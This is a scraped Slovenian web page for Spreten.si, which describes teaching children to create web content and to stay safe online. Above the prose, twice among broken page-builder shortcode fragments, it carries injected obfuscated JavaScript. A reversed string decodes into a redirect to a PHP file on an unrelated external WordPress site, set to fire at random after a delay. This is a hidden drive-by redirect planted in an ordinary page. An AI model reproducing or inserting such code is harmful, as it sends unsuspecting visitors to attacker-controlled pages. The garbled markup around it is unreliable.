Select Page
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_width=”off” width_unit=”off” custom_width_px=”1080px” custom_width_percent=”80%” make_equal=”off” use_custom_gutter=”off” fullwidth=”off” specialty=”off” admin_label=”section” disabled=”off”]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_width=”off” width_unit=”off” custom_width_px=”1080px” custom_width_percent=”80%” use_custom_gutter=”off” gutter_width=”3″ padding_mobile=”off” allow_player_pause=”off” parallax=”off” parallax_method=”on” make_equal=”off” column_padding_mobile=”on” parallax_1=”off” parallax_method_1=”on” parallax_2=”off” parallax_method_2=”on” parallax_3=”off” parallax_method_3=”on” parallax_4=”off” parallax_method_4=”on” admin_label=”row” disabled=”off”]

Obvladovanje spletnih vsebin

 

Splet je novi svet. Že danes se na njem mnogi živijo drugo življenje, v prihodnosti bo splet prevzemal vedno več delov našega življenja. Če se ga bomo ubranili v zasebnem življenju, pa se ga poslovno in poklicno ne bomo mogli izogniti!

Pri Spreten.si otroke pripravljamo na “spletno življenje in delo” na dva načina:

  • Ustvarjamo fotografije, video posnetke, besedila in ostale predstavitve za splet. Pri tem skrbimo, da je kakovost narejenega na najvišjem možnem nivoju: iz posnetkov nastajajo filmi, iz fotografij kolaži, besedila sledijo novinarskim ali narativnim prvinam (zgodbe) in uporabljamo zanimive načine predstavitev (animacija, igrica, dinamična predstavitev ipd.).
  • Opozarjamo na nevarnosti na spletu in internetu. Glede na starost otrok na njim prilagojen način osveščamo o odvisnosti od igranja igric in virtualnega klepeta ter o obnašanju na spletu in družbenih omrežjih, da se preprečijo prevare, nasilje ali celo zlorabe. Tukaj prispevek, kako smo spletno družbeno omrežje predstavili 9-letnikom: S šolarji o varnosti na spletu (Večer, februar 2017)